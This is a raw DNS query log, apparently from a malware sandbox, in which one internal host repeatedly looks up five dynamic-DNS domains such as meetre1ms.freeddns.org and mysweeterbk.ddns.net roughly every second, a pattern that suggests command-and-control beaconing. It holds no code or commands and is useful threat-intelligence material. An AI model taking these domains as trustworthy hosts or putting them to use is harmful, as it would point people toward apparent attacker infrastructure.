Nov 30, 2024 21:20:56.331583977 CET	192.168.2.4	1.1.1.1	0x5937	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:57.410475969 CET	192.168.2.4	1.1.1.1	0xdc16	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:59.347059011 CET	192.168.2.4	1.1.1.1	0x42af	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:00.359288931 CET	192.168.2.4	1.1.1.1	0x551b	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:01.336260080 CET	192.168.2.4	1.1.1.1	0x1c72	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:01.481594086 CET	192.168.2.4	1.1.1.1	0x5a07	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:02.425920010 CET	192.168.2.4	1.1.1.1	0xfab2	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:04.086724997 CET	192.168.2.4	1.1.1.1	0x64a3	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:04.956564903 CET	192.168.2.4	1.1.1.1	0x40f5	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:06.472410917 CET	192.168.2.4	1.1.1.1	0xa052	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:06.610152006 CET	192.168.2.4	1.1.1.1	0x3a83	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:07.395179987 CET	192.168.2.4	1.1.1.1	0xf149	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:09.362833977 CET	192.168.2.4	1.1.1.1	0x3e8b	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:10.081568956 CET	192.168.2.4	1.1.1.1	0x37f8	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:11.300690889 CET	192.168.2.4	1.1.1.1	0x7e3b	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:11.440706968 CET	192.168.2.4	1.1.1.1	0xb596	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:12.097825050 CET	192.168.2.4	1.1.1.1	0x881	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:14.143867970 CET	192.168.2.4	1.1.1.1	0x5609	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:15.144154072 CET	192.168.2.4	1.1.1.1	0x7e2c	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:16.081947088 CET	192.168.2.4	1.1.1.1	0x4226	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:16.223571062 CET	192.168.2.4	1.1.1.1	0x9ccc	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:17.114682913 CET	192.168.2.4	1.1.1.1	0x9b03	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:18.940857887 CET	192.168.2.4	1.1.1.1	0x254e	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:19.957072020 CET	192.168.2.4	1.1.1.1	0xb92c	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:20.911865950 CET	192.168.2.4	1.1.1.1	0xd288	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:21.060028076 CET	192.168.2.4	1.1.1.1	0x47a9	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:21.925966024 CET	192.168.2.4	1.1.1.1	0xb4fc	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:24.051876068 CET	192.168.2.4	1.1.1.1	0xa95	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:24.958461046 CET	192.168.2.4	1.1.1.1	0x3a30	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:26.003395081 CET	192.168.2.4	1.1.1.1	0xebc	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:26.142193079 CET	192.168.2.4	1.1.1.1	0x9de0	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:26.914160967 CET	192.168.2.4	1.1.1.1	0x34e2	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:28.894304991 CET	192.168.2.4	1.1.1.1	0x9b27	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:29.909570932 CET	192.168.2.4	1.1.1.1	0x5faf	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:30.894481897 CET	192.168.2.4	1.1.1.1	0xa492	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:31.042433977 CET	192.168.2.4	1.1.1.1	0x1ec7	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:31.894876003 CET	192.168.2.4	1.1.1.1	0xfbb6	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:33.894922018 CET	192.168.2.4	1.1.1.1	0x8e56	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:34.894846916 CET	192.168.2.4	1.1.1.1	0x932b	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:35.895925999 CET	192.168.2.4	1.1.1.1	0x4785	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:36.037107944 CET	192.168.2.4	1.1.1.1	0xd33b	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:36.899306059 CET	192.168.2.4	1.1.1.1	0xd468	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:38.894054890 CET	192.168.2.4	1.1.1.1	0x7ee4	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:39.894634008 CET	192.168.2.4	1.1.1.1	0x27a3	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:40.893779993 CET	192.168.2.4	1.1.1.1	0xbe05	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:41.032602072 CET	192.168.2.4	1.1.1.1	0x76d0	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:41.897578001 CET	192.168.2.4	1.1.1.1	0x752	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:43.893748999 CET	192.168.2.4	1.1.1.1	0x3a84	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:44.893963099 CET	192.168.2.4	1.1.1.1	0x3fbf	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:45.894664049 CET	192.168.2.4	1.1.1.1	0x7c02	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:46.033447981 CET	192.168.2.4	1.1.1.1	0x209	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:46.893852949 CET	192.168.2.4	1.1.1.1	0xed04	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:48.895332098 CET	192.168.2.4	1.1.1.1	0x8b51	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:49.894217014 CET	192.168.2.4	1.1.1.1	0x7e08	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:50.893872976 CET	192.168.2.4	1.1.1.1	0xa315	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:51.032885075 CET	192.168.2.4	1.1.1.1	0xc7c1	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:51.893728018 CET	192.168.2.4	1.1.1.1	0x40f6	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:53.899760962 CET	192.168.2.4	1.1.1.1	0x1d59	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:54.894948006 CET	192.168.2.4	1.1.1.1	0x88f8	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:55.976394892 CET	192.168.2.4	1.1.1.1	0xbd33	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:56.174391031 CET	192.168.2.4	1.1.1.1	0x1d43	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:56.894635916 CET	192.168.2.4	1.1.1.1	0xa047	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:58.894963026 CET	192.168.2.4	1.1.1.1	0x398e	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:59.894376040 CET	192.168.2.4	1.1.1.1	0xf74d	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:00.894511938 CET	192.168.2.4	1.1.1.1	0x6e28	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:01.033885956 CET	192.168.2.4	1.1.1.1	0x7091	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:01.894428015 CET	192.168.2.4	1.1.1.1	0xa8d	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:03.896915913 CET	192.168.2.4	1.1.1.1	0x2836	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:04.894059896 CET	192.168.2.4	1.1.1.1	0x3dcc	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:05.893786907 CET	192.168.2.4	1.1.1.1	0x2a59	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:06.033982992 CET	192.168.2.4	1.1.1.1	0x6b64	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:06.894414902 CET	192.168.2.4	1.1.1.1	0x85bc	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:08.954592943 CET	192.168.2.4	1.1.1.1	0xfb01	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:09.893695116 CET	192.168.2.4	1.1.1.1	0x58f	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:10.893994093 CET	192.168.2.4	1.1.1.1	0x3810	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:11.038041115 CET	192.168.2.4	1.1.1.1	0x159d	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:11.907481909 CET	192.168.2.4	1.1.1.1	0x6e51	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:13.894856930 CET	192.168.2.4	1.1.1.1	0x7e0d	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:14.895778894 CET	192.168.2.4	1.1.1.1	0x68fc	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:16.047391891 CET	192.168.2.4	1.1.1.1	0x71e2	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:16.186364889 CET	192.168.2.4	1.1.1.1	0x4949	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:16.894490957 CET	192.168.2.4	1.1.1.1	0xf191	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:18.971487045 CET	192.168.2.4	1.1.1.1	0xf322	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:19.894455910 CET	192.168.2.4	1.1.1.1	0xddcf	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:20.894190073 CET	192.168.2.4	1.1.1.1	0x529a	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:21.034493923 CET	192.168.2.4	1.1.1.1	0xb927	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:21.894244909 CET	192.168.2.4	1.1.1.1	0x6ba0	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:23.894102097 CET	192.168.2.4	1.1.1.1	0x36e9	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:24.893747091 CET	192.168.2.4	1.1.1.1	0x42d2	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:25.897209883 CET	192.168.2.4	1.1.1.1	0xd564	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:26.039719105 CET	192.168.2.4	1.1.1.1	0x7c57	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:26.895644903 CET	192.168.2.4	1.1.1.1	0xb41c	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:28.894454956 CET	192.168.2.4	1.1.1.1	0x672a	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:29.894033909 CET	192.168.2.4	1.1.1.1	0xe7ab	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:30.893975973 CET	192.168.2.4	1.1.1.1	0xb283	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:31.032670975 CET	192.168.2.4	1.1.1.1	0x3426	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:31.896282911 CET	192.168.2.4	1.1.1.1	0xb226	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:33.901356936 CET	192.168.2.4	1.1.1.1	0x762e	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:34.897907019 CET	192.168.2.4	1.1.1.1	0x733b	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:35.894407988 CET	192.168.2.4	1.1.1.1	0xb06b	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:36.033179998 CET	192.168.2.4	1.1.1.1	0xb5f4	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:36.893930912 CET	192.168.2.4	1.1.1.1	0xfe1e	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:38.896024942 CET	192.168.2.4	1.1.1.1	0x9951	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:39.893729925 CET	192.168.2.4	1.1.1.1	0xc1d2	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:41.044411898 CET	192.168.2.4	1.1.1.1	0xc02d	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:41.208519936 CET	192.168.2.4	1.1.1.1	0x294f	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:41.894480944 CET	192.168.2.4	1.1.1.1	0x6ae2	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:44.160908937 CET	192.168.2.4	1.1.1.1	0xfaab	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:44.894124985 CET	192.168.2.4	1.1.1.1	0x483	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:45.894345045 CET	192.168.2.4	1.1.1.1	0xe8c3	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:46.032603025 CET	192.168.2.4	1.1.1.1	0xa0e8	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:46.894747972 CET	192.168.2.4	1.1.1.1	0xfccb	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:48.894639969 CET	192.168.2.4	1.1.1.1	0x2538	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:49.894375086 CET	192.168.2.4	1.1.1.1	0x7d25	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:50.894263983 CET	192.168.2.4	1.1.1.1	0xdd42	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:51.033308029 CET	192.168.2.4	1.1.1.1	0x8159	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:51.174865007 CET	192.168.2.4	1.1.1.1	0x8159	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:51.893868923 CET	192.168.2.4	1.1.1.1	0x3a4f	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:53.895992041 CET	192.168.2.4	1.1.1.1	0xb2af	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:54.894814014 CET	192.168.2.4	1.1.1.1	0xe212	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:55.893929958 CET	192.168.2.4	1.1.1.1	0x8c6	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:56.032218933 CET	192.168.2.4	1.1.1.1	0x3d1c	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:56.894174099 CET	192.168.2.4	1.1.1.1	0xe5f5	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:58.987997055 CET	192.168.2.4	1.1.1.1	0xba9d	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:59.893984079 CET	192.168.2.4	1.1.1.1	0x4e24	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:00.893949032 CET	192.168.2.4	1.1.1.1	0x604f	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:01.039454937 CET	192.168.2.4	1.1.1.1	0xd1a1	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:02.390722036 CET	192.168.2.4	1.1.1.1	0xb5b1	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:03.895972967 CET	192.168.2.4	1.1.1.1	0x85e5	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:05.071913004 CET	192.168.2.4	1.1.1.1	0xb130	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:05.900295973 CET	192.168.2.4	1.1.1.1	0x8bb8	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:06.042884111 CET	192.168.2.4	1.1.1.1	0x64d5	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:06.894731045 CET	192.168.2.4	1.1.1.1	0x833e	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:08.893817902 CET	192.168.2.4	1.1.1.1	0x5bd1	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:09.894622087 CET	192.168.2.4	1.1.1.1	0xfdf3	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:10.894462109 CET	192.168.2.4	1.1.1.1	0xb20	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:11.033781052 CET	192.168.2.4	1.1.1.1	0x3a7e	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:11.893923998 CET	192.168.2.4	1.1.1.1	0x61f6	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:13.894675970 CET	192.168.2.4	1.1.1.1	0xfbb3	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:14.921612978 CET	192.168.2.4	1.1.1.1	0x4ba0	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:15.893888950 CET	192.168.2.4	1.1.1.1	0xd4d3	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:16.033884048 CET	192.168.2.4	1.1.1.1	0x2f68	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:16.174874067 CET	192.168.2.4	1.1.1.1	0x2f68	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:16.894491911 CET	192.168.2.4	1.1.1.1	0x577d	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:18.894267082 CET	192.168.2.4	1.1.1.1	0x5ece	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:19.894587040 CET	192.168.2.4	1.1.1.1	0xceed	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:20.912005901 CET	192.168.2.4	1.1.1.1	0xfcd0	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:21.056905985 CET	192.168.2.4	1.1.1.1	0xcfa7	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:21.894498110 CET	192.168.2.4	1.1.1.1	0xdd36	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:23.894733906 CET	192.168.2.4	1.1.1.1	0xcceb	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:24.897948027 CET	192.168.2.4	1.1.1.1	0x9ffe	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:25.893898010 CET	192.168.2.4	1.1.1.1	0xccbd	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:26.032262087 CET	192.168.2.4	1.1.1.1	0x371f	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:26.896938086 CET	192.168.2.4	1.1.1.1	0xf41b	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:28.894193888 CET	192.168.2.4	1.1.1.1	0x174a	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:29.893872976 CET	192.168.2.4	1.1.1.1	0x547a	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:31.042069912 CET	192.168.2.4	1.1.1.1	0x86e2	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:31.323503017 CET	192.168.2.4	1.1.1.1	0x2510	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:31.897393942 CET	192.168.2.4	1.1.1.1	0x2ddf	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:33.917188883 CET	192.168.2.4	1.1.1.1	0x38f1	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:34.898171902 CET	192.168.2.4	1.1.1.1	0xc492	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:35.904215097 CET	192.168.2.4	1.1.1.1	0xe170	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:36.042309999 CET	192.168.2.4	1.1.1.1	0xc761	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:36.893954039 CET	192.168.2.4	1.1.1.1	0xcdb8	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:38.894542933 CET	192.168.2.4	1.1.1.1	0xf80f	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:39.894397974 CET	192.168.2.4	1.1.1.1	0x2afd	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:40.894722939 CET	192.168.2.4	1.1.1.1	0xe0e5	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:41.034581900 CET	192.168.2.4	1.1.1.1	0x63f7	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:41.894500971 CET	192.168.2.4	1.1.1.1	0xcdb	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:43.894792080 CET	192.168.2.4	1.1.1.1	0x5cb0	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:44.912839890 CET	192.168.2.4	1.1.1.1	0x8eef	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:45.894596100 CET	192.168.2.4	1.1.1.1	0x4155	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:46.033504963 CET	192.168.2.4	1.1.1.1	0x3b9	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
